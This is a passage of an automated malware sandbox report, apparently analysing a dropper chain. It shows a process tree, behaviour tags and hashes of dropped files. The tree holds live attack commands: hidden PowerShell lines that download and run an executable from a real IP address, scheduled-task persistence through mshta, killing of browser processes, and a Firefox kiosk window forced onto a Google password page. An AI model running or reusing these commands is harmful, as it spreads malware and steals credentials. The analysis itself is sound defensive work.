                                              "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1086934021\am_no.cmd" any_word
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:1380
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /t 2
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                • Delays execution with timeout.exe
                                                PID:2888
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1960
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                  6⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:868
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2540
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                  6⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1552
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2396
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                  6⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1228
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /create /tn "jlVecmamSIv" /tr "mshta \"C:\Temp\IDMxEeRQb.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2164
                                              • C:\Windows\SysWOW64\mshta.exe
                                                mshta "C:\Temp\IDMxEeRQb.hta"
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2840
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                  6⤵
                                                  • Blocklisted process makes network request
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Downloads MZ/PE file
                                                  • Loads dropped DLL
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1920
                                                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                    7⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:1340
                                          • C:\Users\Admin\AppData\Local\Temp\1086949001\ad82802eed.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1086949001\ad82802eed.exe"
                                            3⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:2580
                                          • C:\Users\Admin\AppData\Local\Temp\1086950001\27e8838a56.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1086950001\27e8838a56.exe"
                                            3⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:1692
                                          • C:\Users\Admin\AppData\Local\Temp\1086951001\d33bacfc5a.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1086951001\d33bacfc5a.exe"
                                            3⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:2140
                                          • C:\Users\Admin\AppData\Local\Temp\1086952001\19338d89d6.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1086952001\19338d89d6.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of FindShellTrayWindow
                                            • Suspicious use of SendNotifyMessage
                                            PID:1780
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /IM firefox.exe /T
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2552
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /IM chrome.exe /T
                                              4⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1520
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /IM msedge.exe /T
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2440
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /IM opera.exe /T
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2328
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /IM brave.exe /T
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:864
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                              4⤵
                                                PID:1956
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                  5⤵
                                                  • Checks processor information in registry
                                                  • Modifies registry class
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of FindShellTrayWindow
                                                  • Suspicious use of SendNotifyMessage
                                                  PID:2436
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2436.0.1987888136\1634371523" -parentBuildID 20221007134813 -prefsHandle 1272 -prefMapHandle 1060 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e6179487-44bc-432c-9580-6cb6fb518d24} 2436 "\\.\pipe\gecko-crash-server-pipe.2436" 1372 ecd8158 gpu
                                                    6⤵
                                                      PID:2088
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2436.1.1536611411\940543902" -parentBuildID 20221007134813 -prefsHandle 1520 -prefMapHandle 1500 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {af229f1e-fda7-4234-aa12-6868a08d8a08} 2436 "\\.\pipe\gecko-crash-server-pipe.2436" 1548 ebfab58 socket
                                                      6⤵
                                                        PID:1180
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2436.2.1125164625\366372236" -childID 1 -isForBrowser -prefsHandle 2276 -prefMapHandle 2260 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {042c0275-2b2a-4aba-ac07-8b464bcdcfef} 2436 "\\.\pipe\gecko-crash-server-pipe.2436" 2288 18fdc258 tab
                                                        6⤵
                                                          PID:2428
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2436.3.1780285004\52098390" -childID 2 -isForBrowser -prefsHandle 2900 -prefMapHandle 2896 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bf4d5766-5863-428c-80b1-ced5b6baa882} 2436 "\\.\pipe\gecko-crash-server-pipe.2436" 2920 1dac3758 tab
                                                          6⤵
                                                            PID:2116
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2436.4.2134464716\1616560900" -childID 3 -isForBrowser -prefsHandle 1112 -prefMapHandle 3676 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b098514-85bd-4e29-8220-36594987c9fd} 2436 "\\.\pipe\gecko-crash-server-pipe.2436" 3684 220d3458 tab
                                                            6⤵
                                                              PID:3460
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2436.5.1386347754\1495044104" -childID 4 -isForBrowser -prefsHandle 3800 -prefMapHandle 3804 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1bba4147-f4df-48fa-9c4f-aea91ebf2b8f} 2436 "\\.\pipe\gecko-crash-server-pipe.2436" 3788 220d4958 tab
                                                              6⤵
                                                                PID:3472
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2436.6.1974610076\621099405" -childID 5 -isForBrowser -prefsHandle 3976 -prefMapHandle 3980 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {af8ab727-f6d2-432c-9d4b-23691aed7b03} 2436 "\\.\pipe\gecko-crash-server-pipe.2436" 3964 220d3a58 tab
                                                                6⤵
                                                                  PID:3484
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2436.7.1999850595\99695439" -parentBuildID 20221007134813 -prefsHandle 1344 -prefMapHandle 2512 -prefsLen 26531 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {10f6c82e-b267-4cc3-bd9b-8d75782ce56f} 2436 "\\.\pipe\gecko-crash-server-pipe.2436" 1540 ecd7b58 gpu
                                                                  6⤵
                                                                    PID:3520
                                                            • C:\Users\Admin\AppData\Local\Temp\1086953001\dcc3187c3d.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\1086953001\dcc3187c3d.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious use of FindShellTrayWindow
                                                              • Suspicious use of SendNotifyMessage
                                                              PID:2360
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c schtasks /create /tn DG8LamaGXRH /tr "mshta C:\Users\Admin\AppData\Local\Temp\0dPwHKMxQ.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2344
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /create /tn DG8LamaGXRH /tr "mshta C:\Users\Admin\AppData\Local\Temp\0dPwHKMxQ.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                  5⤵
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:2728
                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                mshta C:\Users\Admin\AppData\Local\Temp\0dPwHKMxQ.hta
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                • Modifies Internet Explorer settings
                                                                PID:2324
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MJLDUKZQ9YE0DVBOIKZ7UXGLYCLFKOLF.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                                  5⤵
                                                                  • Blocklisted process makes network request
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Downloads MZ/PE file
                                                                  • Loads dropped DLL
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1288
                                                                  • C:\Users\Admin\AppData\Local\TempMJLDUKZQ9YE0DVBOIKZ7UXGLYCLFKOLF.EXE
                                                                    "C:\Users\Admin\AppData\Local\TempMJLDUKZQ9YE0DVBOIKZ7UXGLYCLFKOLF.EXE"
                                                                    6⤵
                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                    • Checks BIOS information in registry
                                                                    • Executes dropped EXE
                                                                    • Identifies Wine through registry keys
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:4040
                                                            • C:\Users\Admin\AppData\Local\Temp\1086954001\bb075283c5.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\1086954001\bb075283c5.exe"
                                                              3⤵
                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                              • Checks BIOS information in registry
                                                              • Executes dropped EXE
                                                              • Identifies Wine through registry keys
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              • System Location Discovery: System Language Discovery
                                                              • Modifies system certificate store
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:3732
                                                            • C:\Users\Admin\AppData\Local\Temp\1086955001\ef15b74a70.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\1086955001\ef15b74a70.exe"
                                                              3⤵
                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                              • Checks BIOS information in registry
                                                              • Executes dropped EXE
                                                              • Identifies Wine through registry keys
                                                              • Writes to the Master Boot Record (MBR)
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              PID:3888
                                                            • C:\Users\Admin\AppData\Local\Temp\1086956001\586e2a0f18.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\1086956001\586e2a0f18.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              • Modifies system certificate store
                                                              PID:4040
                                                            • C:\Users\Admin\AppData\Local\Temp\1086957001\b2b14b4ec3.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\1086957001\b2b14b4ec3.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3956
                                                            • C:\Users\Admin\AppData\Local\Temp\1086958001\dcda83bfaa.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\1086958001\dcda83bfaa.exe"
                                                              3⤵
                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                              • Checks BIOS information in registry
                                                              • Executes dropped EXE
                                                              • Identifies Wine through registry keys
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              • Suspicious use of SetThreadContext
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2972
                                                              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:1612
                                                            • C:\Users\Admin\AppData\Local\Temp\1086959001\Ta3ZyUR.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\1086959001\Ta3ZyUR.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Suspicious use of SetThreadContext
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3896
                                                              • C:\Users\Admin\AppData\Local\Temp\1086959001\Ta3ZyUR.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1086959001\Ta3ZyUR.exe"
                                                                4⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                PID:3848
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3896 -s 556
                                                                4⤵
                                                                • Program crash
                                                                PID:3908
                                                            • C:\Users\Admin\AppData\Local\Temp\1086960001\d2YQIJa.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\1086960001\d2YQIJa.exe"
                                                              3⤵
                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                              • Checks BIOS information in registry
                                                              • Executes dropped EXE
                                                              • Identifies Wine through registry keys
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2392
                                                            • C:\Users\Admin\AppData\Local\Temp\1086961001\3omTNLZ.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\1086961001\3omTNLZ.exe"
                                                              3⤵
                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                              • Checks BIOS information in registry
                                                              • Executes dropped EXE
                                                              • Identifies Wine through registry keys
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2376
                                                            • C:\Users\Admin\AppData\Local\Temp\1086962001\7aencsM.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\1086962001\7aencsM.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3656
                                                              • C:\Users\Admin\AppData\Local\Temp\1086962001\7aencsM.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1086962001\7aencsM.exe"
                                                                4⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                PID:1876
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 556
                                                                4⤵
                                                                • Program crash
                                                                PID:2320
                                                            • C:\Users\Admin\AppData\Local\Temp\1086963001\DTQCxXZ.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\1086963001\DTQCxXZ.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2316
                                                        • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                          "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                          1⤵
                                                            PID:2264
                                                          • C:\Windows\system32\taskeng.exe
                                                            taskeng.exe {A9C2321A-103A-4E5A-A27D-751741F8F62B} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]
                                                            1⤵
                                                              PID:1744
                                                              • C:\ProgramData\arujxb\oaglv.exe
                                                                C:\ProgramData\arujxb\oaglv.exe start2
                                                                2⤵
                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                • Checks BIOS information in registry
                                                                • Executes dropped EXE
                                                                • Identifies Wine through registry keys
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:2884
                                                              • C:\ProgramData\arujxb\oaglv.exe
                                                                C:\ProgramData\arujxb\oaglv.exe start2
                                                                2⤵
                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                • Checks BIOS information in registry
                                                                • Executes dropped EXE
                                                                • Identifies Wine through registry keys
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                PID:1796

                                                            Network

                                                            MITRE ATT&CK Enterprise v15

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads

                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                              Filesize

                                                              342B

                                                              MD5

                                                              c28eb1a4716ca4687657e8898272949b

                                                              SHA1

                                                              9dab374f107c39e4c8b4dcd70c209a027ee41295

                                                              SHA256

                                                              8b79ed7980ad2c81ee52eaef7fad1764152522b696c916b4d1551f546064cbf7

                                                              SHA512

                                                              87c94c285be6b17ed4ca30aba6a6ffa0b9ed510c98946dee6da4fd1bfd663d9ed3b9afedb0b1617bfb10820af19ef5dfa06df8b1146ce025b91f8819105df2f4

                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

                                                              Filesize

                                                              264KB

                                                              MD5

                                                              f50f89a0a91564d0b8a211f8921aa7de

                                                              SHA1

                                                              112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                              SHA256

                                                              b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                              SHA512

                                                              bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

                                                              Filesize

                                                              16B

                                                              MD5

                                                              18e723571b00fb1694a3bad6c78e4054

                                                              SHA1

                                                              afcc0ef32d46fe59e0483f9a3c891d3034d12f32

                                                              SHA256

                                                              8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

                                                              SHA512

                                                              43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDDDRHWK\service[1].htm

                                                              Filesize

                                                              1B

                                                              MD5

                                                              cfcd208495d565ef66e7dff9f98764da

                                                              SHA1

                                                              b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                              SHA256

                                                              5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                              SHA512

                                                              31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n3lsnn48.default-release\activity-stream.discovery_stream.json.tmp

                                                              Filesize

                                                              30KB

                                                              MD5

                                                              45c4c83eac4919b14f4cec6da8edec79

                                                              SHA1

                                                              974ad2be40b5bbd5da374744613fcd7380f76c5f

                                                              SHA256

                                                              954535b1072061004f9e20021a91ebaac76eb8451d53025c7c37ff0ce4fd391a

                                                              SHA512

                                                              891d82b4b5dd65853debb506be8719add286e2b09ead20794998f09bc759eed8b18b840f2b14c1c161f44c40bc5cc0e799d7fca4282fe11be9aa33afa190d341

                                                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n3lsnn48.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                                                              Filesize

                                                              15KB

                                                              MD5

                                                              96c542dec016d9ec1ecc4dddfcbaac66

                                                              SHA1

                                                              6199f7648bb744efa58acf7b96fee85d938389e4

                                                              SHA256

                                                              7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                                                              SHA512

                                                              cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                                                            • C:\Users\Admin\AppData\Local\TempQBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE

                                                              Filesize

                                                              1.7MB

                                                              MD5

                                                              72d0f5501f2af841fb3290b044a47184

                                                              SHA1

                                                              4dd8dd600b0659967b154c6e06f45a1dde1fcb8b

                                                              SHA256

                                                              492c98afe2462bf38137cd7fb0079c36b66ef80850fffd0754fa1293ec96723a

                                                              SHA512

                                                              812dbda6d668446541c339ed4c150089f10ee23b4d818373ce765d23c479428a17195babe0f03a256b56dc5693f1a261e9336be113965c8fd0eb2e09613c7c31

                                                            • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe

                                                              Filesize

                                                              345KB

                                                              MD5

                                                              3987c20fe280784090e2d464dd8bb61a

                                                              SHA1

                                                              22427e284b6d6473bacb7bc09f155ef2f763009c

                                                              SHA256

                                                              e9af37031ed124a76401405412fe2348dad28687ac8f25bf8a992299152bd6d9

                                                              SHA512

                                                              5419469496f663cedcfa4acc6d13018a8ee957a43ff53f6ffa5d30483480838e4873ff64d8879996a32d93c11e727f0dded16ca04ab2e942ed5376ba29b10018

                                                            • C:\Users\Admin\AppData\Local\Temp\10008230101\bb6617c10a.exe

                                                              Filesize

                                                              3.8MB

                                                              MD5

                                                              50dcd88cf06c4cf3db8922148fbe5377

                                                              SHA1

                                                              c51e09a9fb06e2f266a01e07f48ec949e9ada01c

                                                              SHA256

                                                              02c1345c87a8cf0e14e68a0d2578474299ead46f7d5cae9021027392e21a87ff

                                                              SHA512

                                                              0881fed456742366c4598f7b9ce7183b18cccb4efc33de4b8ec24dbba21c03fcc5946842512272c04c631fc75453c37c943587581eab1fc4a61f9e0920bd2351

                                                            • C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe

                                                              Filesize

                                                              665KB

                                                              MD5

                                                              80c187d04d1f0a5333c2add836f8e114

                                                              SHA1

                                                              3f50106522bc18ea52934110a95c4e303df4665c

                                                              SHA256

                                                              124ad20b4a2db1cff783c08bfc45bed38fd915ed48adecbc844eb4e478b268a0

                                                              SHA512

                                                              4bef94e3bf76a517330ac21735ca35ff73dc63127b8d2be5f46323f8cfbe967e078d26fc79f5def8a3eb93d8da2d10fc67947d0cf5ec785300883a61556a7354

                                                            • C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe

                                                              Filesize

                                                              6.1MB

                                                              MD5

                                                              10575437dabdddad09b7876fd8a7041c

                                                              SHA1

                                                              de3a284ff38afc9c9ca19773be9cc30f344640dc

                                                              SHA256

                                                              ccb13d918b0af7ef19e96a4c53901ec60685564aaa3b90feba4e5214f8c5c097

                                                              SHA512

                                                              acad2043585eeaa328d07bf58d65f0bec165357240f8494a39dc7bed9f755458e2c814bc07101462e4b664fb726617dbf4d816e2b7ffd4dbfa829b44f784e1b0

                                                            • C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe

                                                              Filesize

                                                              1.7MB

                                                              MD5

                                                              74183fecff41da1e7baf97028fee7948

                                                              SHA1

                                                              b9a7c4a302981e7e447dbf451b7a8893efb0c607

                                                              SHA256

                                                              04032a467e48ca2cc8b1310fa8e27225faf21479126d4f61e356fa356ef2128a

                                                              SHA512

                                                              9aae3f12feb4fba81e29754ba3eac17d00e5f8db9b1319d37dcec636d1b4dea2022b679498303900fdb8956bf11cffd0be1c6e873781ab656d260f48f0872584

                                                            • C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe

                                                              Filesize

                                                              272KB

                                                              MD5

                                                              e2292dbabd3896daeec0ade2ba7f2fba

                                                              SHA1

                                                              e50fa91386758d0bbc8e2dc160e4e89ad394fcab

                                                              SHA256

                                                              5a933f763d60fae9b38b88a77cf4636d633e4b25d45fc191281e55ab98214d8a

                                                              SHA512

                                                              d4b8f612b448326edca08f3652d8973c08272274c1e4d85086a6cf23443475ad891b051f5bbf054cc1e2317f4378cde6899315ac22c60defd3791f3b04bee221

                                                            • C:\Users\Admin\AppData\Local\Temp\1085139001\C3hYpvm.exe

                                                              Filesize

                                                              38KB

                                                              MD5

                                                              65a2e68be12cf41547d601c456c04edd

                                                              SHA1

                                                              c39fec7bd6d0fce49441798605452f296f519689

                                                              SHA256

                                                              21d6ba16ce4cbfcfe52d2e2eed27ae1936b0c49807100acb9523b85a85a86f1c

                                                              SHA512

